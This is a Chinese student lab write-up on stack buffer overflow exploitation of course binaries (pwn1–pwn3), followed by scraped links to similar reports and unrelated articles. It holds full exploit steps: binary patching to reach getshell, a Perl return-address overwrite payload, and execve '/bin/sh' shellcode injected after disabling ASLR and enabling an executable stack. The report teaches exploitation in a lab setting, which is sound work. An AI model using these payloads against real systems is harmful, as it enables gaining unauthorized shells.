实验模块

(一)直接修改程序机器指令,改变程序执行流程;

(二)通过构造输入参数,造成BOF攻击,改变程序执行流;

(三)注入Shellcode并执行;


实验准备

  1. 设置共享文件夹(这一步我已经在之前安装kali的时候做好了)

  2. 将老师提供的pwn1文件通过共享文件夹传到kali上以便以后使用。

  3. pwn1文件复制到主目录下,并进行备份

  4. 输入apt-get install lib32z1指令,使64位kali可以运行32位程序


知识点描述

  1. 掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码

具体用法和功能可参考汇编指令和机器码的对应表

  • NOP汇编指令的机器码是“90”
  • JNE汇编指令的机器码是“75”
  • JE 汇编指令的机器码是“74”
  • JMP汇编指令的机器码是“eb”
  • CMP汇编指令的机器码是“39”
  1. 掌握反汇编与十六进制编程器
  • 反汇编指令objdump -d filename,可参考Linux下C程序的反汇编

    • 如果我们想要以全屏幕的方式按页显示反汇编的内容,可以利用“管道”,即在反汇编指令后添加| more,这样我们就可以利用more的一些快捷键,如:Enter(向下翻滚一行),空格(向下滚动一屏),Q(退出命令)
  • 管道“|”,输出重定向“>”,具体的功能和用法可参考linux下输入输出重定向和管道符

  • 十六进制编程器,是用来以16进制视图进行文本编辑的编辑工具软件。其实我们只需要用各系统都兼容的“vim”编辑器就可以实现十六进制编辑的功能。具体步骤如下:

    • 输入命令vi pwn1查看可执行文件内容,为ASCII码形式显示;
    • 输入:%!xxd将显示模式切换为16进制模式;
    • 进行相关操作后,输入:%!xxd -r转换16进制为为ASCII码形式。
  1. 能正确修改机器指令改变程序执行流程
  1. 能正确构造payload进行bof攻击

任务一 直接修改程序机器指令,改变程序执行流程

通过修改main函数中的call指令跳转的地址,使其本来该跳转到foo函数时,跳转到getshell函数,从而运行getshell函数。

:call指令的机器码为e8,其跳转的位置为寄存器eip的值+call指令后的立即数

1.输入指令objdump -d pwn1 | more反汇编pwn1文件。

通过反汇编,可以看到main函数中的call 804891<foo>,其机器码为e8 d7 ff ff ff

其中foo函数的地址为08048491,getshell函数的地址为0804847d,通过计算其对应关系(小端机器)

0x08048491 - 0x0804847d = 0x00000014  //计算地址差
0xffffffd7 - 0x00000014 = 0xffffffc3 //计算要修改的目标地址

2.输入指令vi pwn1打开文件

打开之后我们会看到文件以ASCII码的形式出现

3.输入:%!xxd通过调用命令行,将文件转换为16进制查看

4.使用/d7命令寻找e8d7ffffff机器指令所在位置

5.找到后,输入i进入插入模式,将d7修改为c3

6.输入:%!xxd -r将文件转换为ASCII码形式(一定要转换,否则会出问题),输入:wq保存并退出

7.此时输入指令objdump -d pwn1 | more查看,可以发现pwn1文件已经被修改了

8.运行pwn1文件和pwn1.0文件(pwn1文件是被修改过的,pwn1.0文件是原始的未被修改过的),可以发现两个文件的运行结果是截然不同的。

实验成功!!!


任务二 通过构造输入参数,造成BOF攻击,改变程序执行流

pwn2 正常运行是调用函数foo,但是这个函数有Bufferoverflow漏洞。读入字符串时,系统只预留了一定字节的缓冲区,超出部分会造成溢出,我们的目标是覆盖返回地址。尝试发现,当输入为以下字符时已经发生段错误,产生溢出。

1.输入指令objdump -d pwn2 | more查看,计算要达到缓冲区溢出说需要输入的字符数

由上图可以推测,需要输入的字节大约在32字节,下面对其进行验证

2.打开一个终端进入gdb,输入字符串1111111122222222333333334444444412345555,观察一下各寄存器的值

从上图可以看到eip寄存器中的值为0x34333231,对应字符串中的1234

由此可见,如果输入字符串1111111122222222333333334444444412345555,那 1234 那四个数最终会覆盖到堆栈上的返回地址,进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为 getshell 的内存地址,输给pwn2,pwn2就会运行getshell。

getshell函数的地址为:0x0804847d,由于输入字符串时是以ASCII码输入,因此要转换为\x7d\x84\x04\x08,并需要使用Perl语言构造文件(Perl是一门解释型语言,不需要预编译,可以在命令行上直接使用)。

3.输入perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > BOF.1

4.输入xxd BOF.1查看内容

5.通过管道符|,作为pwn1的输入,格式为(cat BOF.1; cat ) | ./pwn2

攻击成功!!!


任务三 注入Shellcode并运行攻击

  • shellcode就是一段机器指令(code),通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),所以这段机器指令被称为shellcode。

  • 在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。

1.输入指令apt-get install execstack安装execstack

并设置堆栈可执行:

execstack -s pwn3    //设置堆栈可执行
execstack -q pwn3 //查询文件的堆栈是否可执行

2.关闭地址随机化(如果不关闭的话,每次操作esp的地址都会发生变化)

more /proc/sys/kernel/randomize_va_space                 //查看随机化是否关闭
echo "0" > /proc/sys/kernel/randomize_va_space //关闭随机化

(“2”为开启,“0”为关闭)

3.我们需要注入一段代码,我们首先构造一个input_shellcode(参考老师给的代码):

perl -e 'print "A" x 32;print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode

4.在一个窗口运行(cat input_shellcode;cat) | ./pwn3

5.在另外一个窗口ps -ef | grep pwn能看见当前运行pwn3的进程号为2396;

6.在gdb里面attach 2396进行调试

7.disassemble foo反编译

8.可以看到ret指令的地址为0x080484ae,在此处设置断点break *0x080484ae

9.在另一个终端按下回车,这样程序就会执行之后在断点处停下来

10.再在gdb调试的终端输入 c 继续运行程序

11.info r esp查看esp寄存器地址

12.x/16x 0xffffd34c以16进制形式查看0xffffd34c地址后面16字节的内容

从上图中看到 01020304所在的地址为0xffffd34c,那么注入的shellcode代码的地址应该在该ret指令地址后四个字节的位置,即0xffffd34c + 0x00000004 = 0xffffd350。随后退出gdb调试。

13.修改注入代码的覆盖地址

perl -e 'print "A" x 32;print"\x50\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode

14.输入命令(cat input_shellcode;cat) | ./pwn3

攻击成功!!!


遇到的问题及解决方法


实验收获与感想

  • 我的收获

虽然在之前的课程中学习过指令体系结构以及其对应机器码的相关内容,但当时学习的时候并没有完全掌握,对堆栈和一些寄存器的使用还很懵懂。第一次动手实现缓冲区溢出攻击,使我对堆栈的结构有了更深的认识,理解了堆栈是怎么被恶意代码覆盖的,覆盖后是怎么实现跳转的,跳转后是怎么执行的;也在实践中掌握了一些常用的指令的机器码以及寄存器的功能。

  • 什么是漏洞?漏洞有什么危害?

通过这次实验,我发现缓冲区溢出漏洞是在程序设计时,由于没有考虑到输入超出栈分配的空间的情况,被攻击者利用造成的,这些漏洞可能一方面与程序设计有关,一方面还与计算机本身的设置和属性有关,比如要想构造payload进行bof攻击,必须提前更改相关设置,让堆栈中的代码可执行,这也可以体现出计算机设置不足也会给攻击者提供机会。危害很大,被攻击的计算机可能会进入命令行模式,从而攻击者可以对文件进行任意的操作,也可能会执行相关的恶意代码,为木马植入、后门设置提供条件。


参考资料

2018-2019-2 网络对抗技术 20165318 Exp1 PC平台逆向破解的更多相关文章

  1. 20165221 《网络对抗技术》EXP1 PC平台逆向破解

    20165221 <网络对抗技术>EXP1 PC平台逆向破解 一.实验内容 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函 ...

  2. 2018-2019-2 网络对抗技术 20165325 Exp1 PC平台逆向破解

    2018-2019-2 网络对抗技术 20165325 Exp1 PC平台逆向破解(BOF实验) 实验有三个模块: (一)直接修改程序机器指令,改变程序执行流程: (二)通过构造输入参数,造成BOF攻 ...

  3. 2018-2019-2 20165206《网络对抗技术》Exp1 PC平台逆向破解

    - 2018-2019-2 20165206<网络对抗技术>Exp1 PC平台逆向破解 - 实验任务 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:mai ...

  4. 2018-2019-2 20165317《网络对抗技术》Exp1 PC平台逆向破解

    2018-2019-2 20165317<网络对抗技术>Exp1 PC平台逆向破解 实验目的 掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码 NOP:无作用,英文&quo ...

  5. 2018-2019-2 网络对抗技术 20165336 Exp1 PC平台逆向破解

    2018-2019-2 网络对抗技术 20165336 Exp1 PC平台逆向破解 1. 逆向及Bof基础实践说明 1.1 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件.该程序正常 ...

  6. 2018-2019-2 网络对抗技术 20165305 Exp1 PC平台逆向破解

    2018-2019-2 网络对抗技术 20165305 Exp1 PC平台逆向破解 实验1-1直接修改程序机器指令,改变程序执行流程 先输入objdump -d 20165305pwn2查看反汇编代码 ...

  7. 2018-2019-2 《网络对抗技术》 Exp1 PC平台逆向破解 20165215

    2018-2019-2 <网络对抗技术> Exp1 PC平台逆向破解 20165215 目录 知识点描述 实验步骤 (一)直接修改程序机器指令,改变程序执行流程 (二)通过构造输入参数,造 ...

  8. 2018-2019-2 20165316 《网络对抗技术》Exp1 PC平台逆向破解

    2018-2019-2 20165316 <网络对抗技术>Exp1 PC平台逆向破解 1 逆向及Bof基础实践说明 1.1 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件 ...

  9. 20165214 2018-2019-2 《网络对抗技术》Exp1 PC平台逆向破解 Week3

    <网络对抗技术>Exp1 PC平台逆向破解之"逆向及Bof基础实践说明" Week3 一. 实验预习 1.什么是漏洞?漏洞有什么危害? 漏洞就是在计算机硬件.软件.协议 ...

随机推荐

  1. 牛刀小试MySQL--基于GTID的replication

    实验环境:两个MySQL实例 IP地址:10.0.0.201 端口:3306 (MySQL的Master) IP地址:10.0.0.201 端口:3307 (MySQL的Slave) 需要的参数 se ...

  2. mysql查看执行sql语句的记录日志

    开启日志模式 -- 1.设置 -- SET GLOBAL log_output = 'TABLE';SET GLOBAL general_log = 'ON';  //日志开启 -- SET GLOB ...

  3. 菜鸟入门【ASP.NET Core】4:在CentOS上安装.NET Core运行时、部署到CentOS

    下载.NET Core SDK 下载地址:https://www.microsoft.com/net/download/windows 第一步:Add the dotnet product feed( ...

  4. C#7.2——编写安全高效的C#代码

    原文地址:https://docs.microsoft.com/zh-cn/dotnet/csharp/write-safe-efficient-code?view=netcore-2.1 值类型的优 ...

  5. [PHP] 算法-找出两个链表的第一个公共结点的PHP实现

    输入两个链表,找出它们的第一个公共结点 1.两个单链表,有公共结点,那么必然,尾部公用 2.找出链表1的长度,找出链表2的长度,长的链表减去短的链表得出一个n值 3.长的链表先走n步,两个链表再同时移 ...

  6. 如何在UWP中统一处理不同设备间的页面回退逻辑

    已经有一段时间没有写博客来记录自己的学习点滴了.现在回想起来确实有些惭愧,期间经历了一些事情,到目前为止算是平息了,是时候该收收心来充实自己了. 在本篇缪文中,楼主打算给UWP开发的初学者讲述一个在开 ...

  7. (二)在实战中使用Sass和Compass

    第三章 无需计算玩转CSS网格布局 3.1 网格布局介绍 3.2 使用网格布局 3.2.1 术语 术语名 定义 是否涉及HTML标签 列 内容度量的垂直单位 否 容器 构成一个网格布局的HTML元素 ...

  8. web print

    <!doctype html> <html lang="en"> <head> <meta charset="utf-8&quo ...

  9. element-ui Carousel 走马灯源码分析整理笔记(十一)

    Carousel 走马灯源码分析整理笔记,这篇写的不详细,后面有空补充 main.vue <template> <!--走马灯的最外层包裹div--> <div clas ...

  10. OkHttp3源码详解(一) Request类

    每一次网络请求都是一个Request,Request是对url,method,header,body的封装,也是对Http协议中请求行,请求头,实体内容的封装 public final class R ...